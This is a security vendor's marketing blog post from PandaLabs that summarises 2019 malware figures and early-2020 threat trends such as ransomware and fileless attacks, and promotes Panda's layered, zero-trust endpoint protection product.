The cybersecurity landscape never stops evolving, and both the scope and velocity of this evolution are increasing and becoming more unpredictable. Antivirus solutions based on specific signatures and generic and heuristic detection are not enough to be able to deal with the flood of new, highly sophisticated malware variants, which continue to infect the systems of companies with lower levels of protection.
Fortunately, as cyberthreats evolve, so too does cybersecurity technology. IT security solutions employ a range of capacities designed to keep networks from being infiltrated, to detect and stop suspicious behavior, and get ahead of future intrusions. In a new landscape with endless unknowns, what should cybersecurity look like in a changing environment?
At PandaLabs, Panda Security’s security laboratory, we registered and analyzed 14.9 million malware events in 2019, stopping 7.9 million potentially Unwanted Programs (PUPs), as well as 76,000 alerts for exploits that intended to leverage vulnerabilities in applications, networks, or hardware in order to compile the main cybersecurity threats and trends in our report. Discover the leading cybercriminal techniques and what you can do to stop them.
This data reinforces the idea behind our cybersecurity model: reactive security is no longer appropriate. There are too many threats and too many attack vectors in any IT environment, all of which can cause a breach. Today, cybersecurity solutions must be predictive, proactive, and prepared to respond to any incident that could arise.
The main cybersecurity technology trends in Q1 2020
Cybercriminals are increasingly stealthy, eagerly taking advantage of errors, hiding their movements, and getting around detection technologies, especially in the cloud, through mobile applications, and on networks.
Cybercriminals are essentially after three things:
- Financial gain, using ransomware to extort money from their victims in return for recovering their stolen information
- Data, which can be sold on the dark web
- Control of infrastructure, networks, or other important systems. This access is sold to influential entities, such as nation states, political groups, paramilitary factions, and others.
How do they manage to do this? Some of the main cyberthreats of the start of this year are:
- Ransomware, the notorious malware variant, is still persistent. A single click is enough to paralyze and entire network, doing away with security controls and backups to make as big an impact as possible in the shortest possible time. Any kind of organization can fall victim to ransomware, as we saw just a few months ago in the wave of attacks that hit public and private institutions around the world.
- Fileless attacks are a growing concern: they are more difficult to detect and make it easier for cybercriminals to attack stealthily. Cybercriminals are changing how they attack, and their strategies no longer necessarily need a specific file to break onto a network, as we have analyzed in the Living-off-the-Land attacks that we registered.
- Proactive threat hunting is now an essential solution for recognizing abnormal and malicious behaviors that exploit trusted applications.
- Cybersecurity solutions can no longer be based on one single technology: they require an approach based on layered technology, combined with a zero-trust posture to stop possible security breaches. These layered technologies provide an unparalleled level of control, visibility, and flexibility. This is what is needed in the dynamic war against unknown attackers. Certified solutions such as Panda Adaptive Defense determine whether devices are running trusted endpoint security applications.
There are increasing numbers of interconnected endpoints, from workstations, to laptops and servers. All of these endpoints require an approach that combines advanced endpoint protection (EPP) and endpoint detection and response (EDR), based on a zero-trust security posture, backed by artificial intelligence. The application of these technologies to cybersecurity is a necessary change in how the industry addresses the problem of cyberthreats. It emphasizes the idea of goodware—known, registered, and classified processes that can run on the endpoint—ensuring that unknown and malicious processes cannot run.
Conclusions: the advantages of multilayer protection
The latest threats require a cybersecurity that has evolved from single technology solutions to multi-layer solutions that employ behavior-based monitoring, among other features, to eliminate persistent threats, fileless attacks, and other malicious activity.
This has resulted in a layered technology model combined with a zero-trust security posture that doesn’t let any unknown processes run on any endpoints on the network. This technology provides two pain advantages:
- Security teams do not have re run in-depth analysis of alerts. Having to run such analyses manually could mean having to employ more staff or leaving alerts unverified, leading to elevated security risks.
- If a security team has to verify these alerts, their MTTD and MTTR (mean time to detect/respond) will be higher than ours. Delaying a decision even by a few minutes could have serious negative repercussions on the potential affects of an attacker or a data breach.
Discover all the advantages of the only solution on the market that classifies 100% of running processes on computers. You can also find out the countries that have been worse hit by different malware families, as well as other data analyzed by PandaLabs here: